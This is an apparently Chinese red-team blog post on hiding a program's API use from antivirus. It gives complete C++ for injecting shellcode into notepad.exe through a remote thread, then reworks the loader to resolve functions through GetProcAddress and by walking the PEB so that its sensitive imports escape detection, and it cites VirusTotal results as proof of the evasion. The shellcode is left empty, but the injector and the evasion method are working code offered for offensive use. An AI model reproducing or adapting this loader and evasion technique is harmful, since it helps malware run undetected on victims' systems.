17370845950

新闻动态

RedTeamTips--PEB隐藏

首先向各位师傅拜个早年，春节将至，公众号将暂停更新一段时间，年后再见。在本文中，我们将探讨如何隐藏程序中的peb信息。首先，让我们了解一下什么是peb，它的全称为process environment block，即进程环境信息块，用于存储进程信息，每个进程都有自己的peb信息，位于用户地址空间。其结构如下：

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

具体结构可以参考下图：

在windbg中，可以使用以下命令查看：

!peb

接下来，我们将介绍如何简单地隐藏PEB信息。首先，我们通过一个简单的远程线程注入示例来展示。

#include
#include
#include
int find_process(const wchar_t* process_name) {
  PROCESSENTRY32 entry;
  entry.dwSize = sizeof(PROCESSENTRY32);
  HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
  int returnValue = 0;
  if (!Process32First(snapshot, &entry)) {
    goto cleanup;
  }
  do {
    if (wcscmp(entry.szExeFile, process_name) == 0) {
      returnValue = entry.th32ProcessID;
      goto cleanup;
    }
  } while (Process32Next(snapshot, &entry));
cleanup:
  CloseHandle(snapshot);
  return returnValue;
}
unsigned char shellcode[] ="\x00";
int main(int argc, char* argv[]){
    HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, true, find_process(L"notepad.exe"));
    LPVOID targetPage = VirtualAllocEx(hTargetProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hTargetProcess, targetPage, shellcode, sizeof(shellcode), NULL);
    DWORD ignored;
    CreateRemoteThread(hTargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)targetPage, NULL, 0, &ignored);
    return EXIT_SUCCESS;
}

其API调用链主要有以下两条：

查找进程PID：

CreateToolhelp32Snapshot --> Process32First --> Process32Next

创建线程：

OpenProcess --> VirtualAllocEx --> WriteProcessMemory --> CreateRemoteThread

这些API调用通常是敏感操作，容易被监控。

VT上也有类似的功能：

查杀率：

解决方法1：使用GetProcAddress

GetProcAddress函数用于获取指定动态链接库(DLL)中的输出库函数地址。这种技术在重明中也有使用。

函数原型：

FARPROC GetProcAddress(
   HMODULE hModule,     // DLL模块句柄
   LPCSTR lpProcName    // 函数名);

以CreateToolhelp32Snapshot为例，改用GetProcAddress的调用方法如下：

HMODULE Kernels32 = GetModuleHandleA("kernel32.dll");
using CreateToolhelp32Snapshots = HANDLE(WINAPI*)(DWORD,DWORD);
CreateToolhelp32Snapshots CreateToolhelp32Snapshot = (CreateToolhelp32Snapshots)GetProcAddress(Kernels32,"CreateToolhelp32Snapshot");

以此类推，最终代码如下：

#include
#include
#include
using namespace std;
unsigned char shellcode[] ="\x00";
HMODULE Kernels32 = GetModuleHandleA("kernel32.dll");
int find_process(const wchar_t* process_name) {
  using CreateToolhelp32Snapshots = HANDLE(WINAPI*)(DWORD,DWORD);
  CreateToolhelp32Snapshots CreateToolhelp32Snapshot = (CreateToolhelp32Snapshots)GetProcAddress(Kernels32,"CreateToolhelp32Snapshot");
  using Process32Firsts = BOOL(WINAPI*)(HANDLE,LPPROCESSENTRY32);
  Process32Firsts Process32First = (Process32Firsts)GetProcAddress(Kernels32,"Process32First");
  using Process32Nexts = Process32Firsts;
  Process32Nexts Process32Next = (Process32Nexts)GetProcAddress(Kernels32,"Process32Next");
  PROCESSENTRY32 entry;
  entry.dwSize = sizeof(PROCESSENTRY32);
  HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
  int returnValue = 0;
  if (!Process32First(snapshot, &entry)) {
    goto cleanup;
  }
  do {
    if (wcscmp(entry.szExeFile, process_name) == 0) {
      returnValue = entry.th32ProcessID;
      goto cleanup;
    }
  } while (Process32Next(snapshot, &entry));
cleanup:
  CloseHandle(snapshot);
  return returnValue;
}
int main(int argc, char* argv[]){
    using OpenProcessPrototype = HANDLE(WINAPI*)(DWORD, BOOL, DWORD);
    OpenProcessPrototype OpenProcess = (OpenProcessPrototype)GetProcAddress(Kernels32, "OpenProcess");
    using VirtualAllocExPrototype = LPVOID(WINAPI*)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
    VirtualAllocExPrototype VirtualAllocEx = (VirtualAllocExPrototype)GetProcAddress(Kernels32, "VirtualAllocEx");
    using WriteProcessMemoryPrototype = BOOL(WINAPI*)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*);
    WriteProcessMemoryPrototype WriteProcessMemory = (WriteProcessMemoryPrototype)GetProcAddress(Kernels32, "WriteProcessMemory");
    using CreateRemoteThreadPrototype = HANDLE(WINAPI*)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
    CreateRemoteThreadPrototype CreateRemoteThread = (CreateRemoteThreadPrototype)GetProcAddress(Kernels32, "CreateRemoteThread");
    HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, true, find_process(L"notepad.exe"));
    LPVOID targetPage = VirtualAllocEx(hTargetProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hTargetProcess, targetPage, shellcode, sizeof(shellcode), NULL);
    DWORD ignored;
    CreateRemoteThread(hTargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)targetPage, NULL, 0, &ignored);
    return EXIT_SUCCESS;
}

函数情况：

在不考虑shellcode的情况下，免杀效果：

解决方法2：从PEB下手

由于PEB是内存中的一个结构，其中包含DLL及其在内存中的位置，我们的思路如下：

遍历PEB，然后从中找到kernel32的地址。找到后，遍历其导出表找到我们需要的函数名称。

其查找地址的方法可以参考以下代码：

#include 
#include 
// Thread Environment Block (TEB)
#if defined(_M_X64) // x64
PTEB tebPtr = reinterpret_cast(__readgsqword(reinterpret_cast(&static_cast(nullptr)->Self)));
#else // x86
PTEB tebPtr = reinterpret_cast(__readfsdword(reinterpret_cast(&static_cast(nullptr)->Self)));
#endif
// Process Environment Block (PEB)
PPEB pebPtr = tebPtr->ProcessEnvironmentBlock;

最终效果如下：

此时我们可以使用上述方法继续操作，最终结果：

注：该方法作者已使用很长时间，效果不错，重明工具中也有相关利用，文章截图皆为最新测试截图，该方法无法清除程序中的字符，如有需要可自行更改。

参考文章：

https://www./link/9c26f743a1c2d7d8a27fb9e8d366d365

https://www./link/f4401dd087608e344ac946c2f5a982e4

https://www./link/5d130e4cef1c50de7e168837012989b0

https://www./link/d7ce4c420a30736d81b6a9fde18fc13c

17370845950

关于我们

服务项目

广告推广

案例欣赏